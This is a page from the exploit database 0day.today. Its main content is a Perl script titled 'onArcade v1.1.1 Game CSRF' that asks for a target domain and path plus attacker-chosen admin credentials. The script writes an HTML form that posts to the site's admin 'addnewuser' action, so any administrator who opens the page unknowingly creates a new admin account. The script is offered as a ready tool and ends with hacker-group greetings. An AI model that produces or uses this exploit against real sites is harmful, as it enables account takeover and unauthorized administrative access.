0day.today - 世界最大的漏洞利用数据库。
![](/img/logo_green.jpg)
- 我们唯一的域名:http://0day.today
- 我们大多数的材料都完全免费
- 如果你想购买漏洞利用 / 获取V.I.P.权限 或者使用其他付费服务,
你需要购买或者赢取金币金币
本站管理员使用官方账号。请谨防诈骗!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
你可以由此方式联系我们:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
onArcade v1.1.1 Game CSRF (Cross-Site Request Forgery) Vulnerability
#!usr/bin/perl ################################################### # Title : onArcade v1.1.1 Game CSRF (Cross-Site Request Forgery) Vulnerability # Software : onArcade Game # Version : 1.1.1 # Date : n/a # Author : Or4nG.M4n # visit : or4ng3m4n.blogspot.com ################################################## # Start Code print q( +----------------------------------------+ | CSRF CREATE YOUR Exploit By 0r4Ng.M4n | | visit : Or4ng3M4n.BlogSpot.com | +----------------------------------------+ ); # add Page name For safe Exploit print "save as :"; $safe=<STDIN>; # add admin name print "admin name :"; $ad=<STDIN>; # add admin pass print "admin pass :"; $ps=<STDIN>; # add admin email print "admin Email :"; $em=<STDIN>; # add host domain print "domain :"; $ho=<STDIN>; # add path script : if you don't add path just Entr print "path :"; $ph=<STDIN>; open(CREATE,">>$safe"); print CREATE " <HTML><HEAD><TITLE>Exploit .. By Or4nG.M4n</TITLE> <form action='http://$ho/$ph/admin/index.php?action=addnewuser' method='POST' name='form'> <input type='hidden' value='$ad' name='eusername' ></td> <input type='hidden' value='$ps' name='euserpassword' ></td> <input type='hidden' value='$em' name='euseremail' > <select name='eusergroup'><option value='2'></option></select></td> <select name='euserstatus'><option value='1'></option></select></td> <input type='submit' name='submit' value='add' ></td>"; close(CREATE); print "d0n3\n"; print q( +---------------------------------------------------+ | # -------------[GreEtz & Thnks]------------- # | | Greetz : Fox , Lagripe-dz , SarBoT511 , SadHaCkEr | | i-Hmx , xss mAn , Cyb3r-sA , Dr.TaiGar , h3llc0d3 | | BiG Thnks : sa^dev!L , Lagripe-dz | +---------------------------------------------------+ | or4ng3m4n.blogspot.com | sec4ever | v4-team | 7rs | ); # End Code # 0day.today [2024-07-02] #